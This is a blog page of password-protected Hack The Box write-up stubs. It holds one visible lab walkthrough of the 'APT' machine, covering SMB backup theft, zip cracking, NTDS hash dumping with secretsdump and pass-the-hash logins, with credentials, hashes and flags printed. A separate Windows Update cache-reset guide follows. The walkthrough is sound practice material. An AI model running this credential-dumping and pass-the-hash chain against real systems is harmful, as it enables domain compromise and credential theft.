Protected: htb-worker-nl

This content is password protected. To view it please enter your password below:

Posted on

Protected: htb-ropetwo-nl

This content is password protected. To view it please enter your password below:

Posted on

Protected: htb-ra2-nl

This content is password protected. To view it please enter your password below:

Posted on

Protected: thm-ra-nl

This content is password protected. To view it please enter your password below:

Posted on

Protected: htb-ready-nl

This content is password protected. To view it please enter your password below:

Posted on

htb-apt-nl

.

i used https://github.com/puckiestyle/python/blob/master/IOXIDresolver.py

reference used :

The OXID Resolver [Part 1] – Remote enumeration of network interfaces without any authentication

┌─[root@parrot-virtual]─[/home/user/htb]
└──╼ #python3 IOXIDresolver.py -t 10.10.10.213
[*] Retrieving network interface of 10.10.10.213
Address: apt
Address: 10.10.10.213
Address: dead:beef::b885:d62a:d679:573f
Address: dead:beef::8d29:507a:2edb:a06e

 

kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i dead:beef::b885:d62a:d679:573f -u roastsvc -p ‘!!!watermelon245’

└──╼

$nmap -6 -sV dead:beef::b885:d62a:d679:573f
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-04 14:52 GMT
Stats: 0:00:12 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 9.09% done; ETC: 14:54 (0:01:00 remaining)
Stats: 0:01:57 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 90.91% done; ETC: 14:55 (0:00:11 remaining)
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.026s latency).
Not shown: 989 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-12-04 14:53:07Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=12/4%Time=5FCA4D54%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: APT; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 149.32 seconds

.

evil-winrm -i dead:beef::b885:d62a:d679:573f -u henry.vinson_adm -p ‘G1#Ny5@2dvht’

1) get IPV6
2) smbclient connect to it and get backup.zip
3) crack zip with rockyou.txt
4) run secretsdump.py (impacket) on ntds.dlt
5) run kerbrute to find valid users
6) make a list of hashes
7) use crackmapexec -H hashes.txt

┌─[✗]─[puck@parrot-lt]─[~/htb/apt]
└──╼ $impacket-smbclient htb.local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Type help for list of commands
# ls
[-] No share selected
# shares
backup
IPC$
NETLOGON
SYSVOL
# use backup
# ls
drw-rw-rw-          0  Thu Sep 24 08:31:03 2020 .
drw-rw-rw-          0  Thu Sep 24 08:31:03 2020 ..
-rw-rw-rw-   10650961  Thu Sep 24 08:31:03 2020 backup.zip
# get backup.zip
┌─[puck@parrot-lt]─[~/htb/apt]
└──╼ $impacket-lookupsid htb.local/henry.vinson_adm:G1#Ny5@2dvht@htb.local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Brute forcing SIDs at htb.local
[*] StringBinding ncacn_np:htb.local[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2993095098-2100462451-206186470
498: HTB\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: HTB\Administrator (SidTypeUser)
501: HTB\Guest (SidTypeUser)
502: HTB\krbtgt (SidTypeUser)
503: HTB\DefaultAccount (SidTypeUser)
512: HTB\Domain Admins (SidTypeGroup)
513: HTB\Domain Users (SidTypeGroup)
514: HTB\Domain Guests (SidTypeGroup)
515: HTB\Domain Computers (SidTypeGroup)
516: HTB\Domain Controllers (SidTypeGroup)
517: HTB\Cert Publishers (SidTypeAlias)
518: HTB\Schema Admins (SidTypeGroup)
519: HTB\Enterprise Admins (SidTypeGroup)
520: HTB\Group Policy Creator Owners (SidTypeGroup)
521: HTB\Read-only Domain Controllers (SidTypeGroup)
522: HTB\Cloneable Domain Controllers (SidTypeGroup)
525: HTB\Protected Users (SidTypeGroup)
526: HTB\Key Admins (SidTypeGroup)
527: HTB\Enterprise Key Admins (SidTypeGroup)
553: HTB\RAS and IAS Servers (SidTypeAlias)
571: HTB\Allowed RODC Password Replication Group (SidTypeAlias)
572: HTB\Denied RODC Password Replication Group (SidTypeAlias)
1001: HTB\APT$ (SidTypeUser)
1102: HTB\DnsAdmins (SidTypeAlias)
1103: HTB\DnsUpdateProxy (SidTypeGroup)
1104: HTB\apt-Admins (SidTypeAlias)
1105: HTB\henry.vinson (SidTypeUser)
1106: HTB\henry.vinson_adm (SidTypeUser)
┌─[user@parrot-virtual]─[~/htb/apt]

.

┌─[user@parrot-virtual]─[~/htb/apt]
└──╼ $zip2john backup.zip > encrypted.hash$
backup.zip/Active Directory/ is not encrypted!
ver 2.0 backup.zip/Active Directory/ is not encrypted, or stored with non-handled compression type
ver 2.0 backup.zip/Active Directory/ntds.dit PKZIP Encr: cmplen=8483543, decmplen=50331648, crc=ACD0B2FB
ver 2.0 backup.zip/Active Directory/ntds.jfm PKZIP Encr: cmplen=342, decmplen=16384, crc=2A393785
ver 2.0 backup.zip/registry/ is not encrypted, or stored with non-handled compression type
ver 2.0 backup.zip/registry/SECURITY PKZIP Encr: cmplen=8522, decmplen=262144, crc=9BEBC2C3
ver 2.0 backup.zip/registry/SYSTEM PKZIP Encr: cmplen=2157644, decmplen=12582912, crc=65D9BFCD
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
┌─[user@parrot-virtual]─[~/htb/apt]
┌─[✗]─[user@parrot-virtual]─[~/htb/apt]
└──╼ $john encrypted.hash\$ --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iloveyousomuch (backup.zip)
1g 0:00:00:00 DONE (2021-01-26 09:37) 20.00g/s 163840p/s 163840c/s 163840C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed
┌─[user@parrot-virtual]─[~/htb/apt]
└──╼ $python3 secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x936ce5da88593206567f650411e1d16b
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 1733ad403c773dde94dddffa2292ffe9
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
APT$:1000:aad3b435b51404eeaad3b435b51404ee:b300272f1cdab4469660d55fe59415cb:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:72791983d95870c0d6dd999e4389b211:::
--snip--
prue.olson:aes256-cts-hmac-sha1-96:cd0d76863148d8ad87c40bd1903a6af2295db46ce3e9494d1f8b95de99b91a64
prue.olson:aes128-cts-hmac-sha1-96:d817cf2341be47674e6d0dccab1237b0
prue.olson:des-cbc-md5:2c5dba54314c20ba
[*] ClearText password from ntds.dit 
APT$:CLEARTEXT:4[%fo'zG`&BhR3cP[)U2NVS\LEYO/&^)<9xj6%#9\\?uJ4YPb`DRK" IES2fXK"f,X(Ql*fg0RfRq=!,BeAVFt^EVRR-L)VaTjv/QG9=o;G@g>Vab-UYc Yd
[*] Cleaning up... 
┌─[user@parrot-virtual]─[~/htb/apt]

.

┌─[user@parrot-virtual]─[~/htb/apt]
└──╼ $python3 secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL > result.txt
┌─[user@parrot-virtual]─[~/htb/apt]
└──╼ $cat result.txt | grep henry
henry.vinson:3647:aad3b435b51404eeaad3b435b51404ee:2de80758521541d19cabba480b260e8f:::
livy.henry:3900:aad3b435b51404eeaad3b435b51404ee:5c0f4f9540cad94bb2554c8684d9ea66:::
henry.vinson:aes256-cts-hmac-sha1-96:4c0ec4cffc953266ed72d9b565da62115655d2f402416af92e4e76d121663e2f
henry.vinson:aes128-cts-hmac-sha1-96:da63c28166768a2829f00d30ec9fbddd
henry.vinson:des-cbc-md5:80a2c83213b3dfd6
livy.henry:aes256-cts-hmac-sha1-96:8f0397da6b26addc0536c294a788b919dd980afb738e3a9c233afcfc90fba5b0
livy.henry:aes128-cts-hmac-sha1-96:b719dae2156cd496995db190411d319e
livy.henry:des-cbc-md5:1043cb0bce31c49e
┌─[user@parrot-virtual]─[~/htb/apt]

 

 

evil-winrm -i dead:beef::b885:d62a:d679:573f -u Administrator -H c370bddf384a691d811ff3495e8a72e2

 

thus

1st add ipv6 ip to etc/hosts !!!!!
dead:beef::b885:d62a:d679:573f apt.htb htb.local

2nd

┌─[user@parrot-virtual]─[/opt/evil-winrm]
└──╼ $sudo ruby evil-winrm.rb -i htb.local -u henry.vinson_adm
Enter Password:G1#Ny5@2dvh

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> ls


Directory: C:\Users\henry.vinson_adm\Documents


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/25/2021 11:53 AM 12674 Powerless.bat


*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> download Powerless.bat
Info: Downloading C:\Users\henry.vinson_adm\Documents\Powerless.bat to Powerless.bat


Info: Download successful!

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents>

3th

┌─[✗]─[user@parrot-virtual]─[/opt/evil-winrm]
└──╼ $ruby evil-winrm.rb -i dead:beef::b885:d62a:d679:573f -u Administrator -H c370bddf384a691d811ff3495e8a72e2

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

Error: An error of type URI::InvalidURIError happened, message is bad URI(is not URI?): "http://dead:beef::b885:d62a:d679:573f:5985/wsman"

Error: Exiting with code 1
┌─[✗]─[user@parrot-virtual]─[/opt/evil-winrm]
└──╼ $ruby evil-winrm.rb -i htb.local -u Administrator -H c370bddf384a691d811ff3495e8a72e2

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
henry.vinson henry.vinson_adm krbtgt
The command completed with one or more errors.


*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> dir

Directory: C:\Users\Administrator

Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/24/2020 9:12 AM Contacts
d-r--- 10/23/2020 10:59 AM Desktop
d-r--- 9/24/2020 9:12 AM Documents
d-r--- 9/24/2020 9:12 AM Downloads
d-r--- 9/24/2020 9:12 AM Favorites
d-r--- 9/24/2020 9:12 AM Links
d-r--- 9/24/2020 9:12 AM Music
d-r--- 9/24/2020 9:12 AM Pictures
d-r--- 9/24/2020 9:12 AM Saved Games
d-r--- 9/24/2020 9:12 AM Searches
d-r--- 9/24/2020 9:12 AM Videos

*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

Directory: C:\Users\Administrator\Desktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/4/2020 1:22 PM 34 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
0ca97e04be5679529b87cc2a2de98782
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd ..
*Evil-WinRM* PS C:\Users\> dir
Directory: C:\Users

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/24/2020 7:54 AM Administrator
d----- 9/24/2020 8:39 AM henry.vinson
d----- 9/24/2020 8:40 AM henry.vinson_adm
d-r--- 11/21/2016 2:39 AM Public

*Evil-WinRM* PS C:\Users> cd henry.vinson_adm
*Evil-WinRM* PS C:\Users\henry.vinson_adm> cd desktop
*Evil-WinRM* PS C:\Users\henry.vinson_adm\desktop> type user.txt
e1e73b8410cf060794a86e7f6a753f83
*Evil-WinRM* PS C:\Users\henry.vinson_adm\desktop>
E:\PENTEST>psexec_windows.exe -hashes c370bddf384a691d811ff3495e8a72e2:c370bddf384a691d811ff3495e8a72e2 administrator@htb.local
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on apt.htb.....
[-] share 'backup' is not writable.
[*] Found writable share NETLOGON
[*] Uploading file RJdJAMfb.exe
[*] Opening SVCManager on apt.htb.....
[*] Creating service kOFV on apt.htb.....
[*] Starting service kOFV.....

.

 

windows-update-clear-update-cache

I recently had a Windows 2016 server that could not install automatic updates. It always hang at some percentage and would never finish. The next step was to try to install an update (.msu file) manually. But this always hung forever at “Copying packages to the update cache”.

Here is what helped me:

Start a cmd box as Administrator

Run the following commands:

net stop wuauserv 
net stop cryptSvc 
net stop bits 
net stop msiserver 

del /f /q "%ALLUSERSPROFILE%\Application Data\Microsoft\Network\Downloader\qmgr*.dat" 
del /f /s /q %SystemRoot%\SoftwareDistribution\*.*  
del /f /s /q %SystemRoot%\system32\catroot2\*.* 
del /f /q %SystemRoot%\WindowsUpdate.log

net start wuauserv 
net start cryptSvc 
net start bits 
net start msiserver

This will clear the Windows Update cache and the automatic updates should work again.

How to Force Kill a Stuck Windows Service Using TaskKill?

The easiest way to stop a stuck service is to use the built-in taskkill command-line tool. First of all, you need to find the PID (process identifier) of the service. As an example, let’s take the Windows Update service. Its system name is wuauserv (you can check the name in the service properties in the services.msc console).

It is very common to see the Windows Modules Installer service hang when the server is restarted, especially after installing updates on Windows Server 2012 R2 and 2016.
Important. Be attentive. Forced termination of critical Windows services can result in BSOD or an unexpected system restart.

Run this command in the elevated command prompt (it is important, or access denied error will appear):
sc queryex wuauserv
In our case, the PID of the wuauserv service is 9186.
To force kill a stuck process with the PID 9186, run the command:

taskkill /PID 9168 /F

SUCCESS: The process with PID 9168 has been terminated.

This command will forcibly terminate the service process. Now you can start the service with the sc start servicename command or through the service management console

You can stop a hung service more elegantly without manually checking the PID of the service process. The taskkill tool has the /FI option, which allows you to use a filter to select the necessary services or processes. You can kill a specific service with the command:

taskkill /F /FI "SERVICES eq wuauserv"

Or you can skip the service name at all and killing all services in a hung state with the command:

taskkill /F /FI "status eq not responding"

After that, the service that is stack in the Stopping status should stop.

You can also use the taskkill utility to force stop the hang services on a remote computer:

taskkill /S mun-fs01 /F /FI "SERVICES eq wuauserv"

Force Stop a Stuck Windows Service with PowerShell

You can also use PowerShell to force the service to stop. Using the following command, you can get a list of services in the Stopping state:

Get-WmiObject -Class win32_service | Where-Object {$_.state -eq 'stop pending'}

Or in the Starting state:

Get-WmiObject -Class win32_service | Where-Object {$_.state -eq 'start pending'}

The Stop-Process cmdlet allows terminating the processes of all found services. The following PowerShell script will terminate all stuck service processes on Windows:

$Services = Get-WmiObject -Class win32_service -Filter "state = 'stop pending'"
if ($Services) {
foreach ($service in $Services) {
try {
Stop-Process -Id $service.processid -Force -PassThru -ErrorAction Stop
}
catch {
Write-Warning -Message "Error. Error details: $_.Exception.Message"
}
}
}
else {
Write-Output "No services with 'Stopping'.status"
}

You must use the Get-CimInstance instead of the Get-WmiObject cmdlet in the new PowerShell Core 6.x/7.x. Replace the first command of the script with:

$Services = Get-CimInstance -Class win32_service | where-Object state -eq 'stop pending'

….

Method 2: Reset Windows update components.

Resetting Windows Update Components will fix corrupt Windows Update Components and help you to install the Windows Updates. Please follow the below steps to reset the Windows Updates Components manually:

  1. Press Windows Key + X on the keyboard and then select “Command Prompt (Admin)” from the menu.
  2. Stop the BITSCryptographicMSI Installer and the Windows Update Services. To do this, type the following commands at a command prompt. Press the “ENTER” key after you type each command.
    • net stop wuauserv
    • net stop cryptSvc
    • net stop bits
    • net stop msiserver
  3. Now rename the SoftwareDistribution and Catroot2 folder. You can do this by typing the following commands in the Command Prompt. Press the “ENTER” key after you type each command.
    • ren C:\Windows\SoftwareDistribution SoftwareDistribution.old
    • ren C:\Windows\System32\catroot2 Catroot2.old
  4. Now, let’s restart the BITS, CryptographicMSI Installer and the Windows Update Services. Type the following commands in the Command Prompt for this. Press the ENTER key after you type each command.
    • net start wuauserv
    • net start cryptSvc
    • net start bits
    • net start msiserver

5. Type Exit in the Command Prompt to close it.

Now you may try running the Windows Updates and check if the above steps resolve the issue.

For reference: https://support.microsoft.com/en-us/kb/971058

Disclaimer: Important this section, method, or task contains steps that tell you how to modify the registry. However, serious problems might occur if you modify the registry incorrectly.

.

 

Protected: htb-luanne-nl

This content is password protected. To view it please enter your password below:

Posted on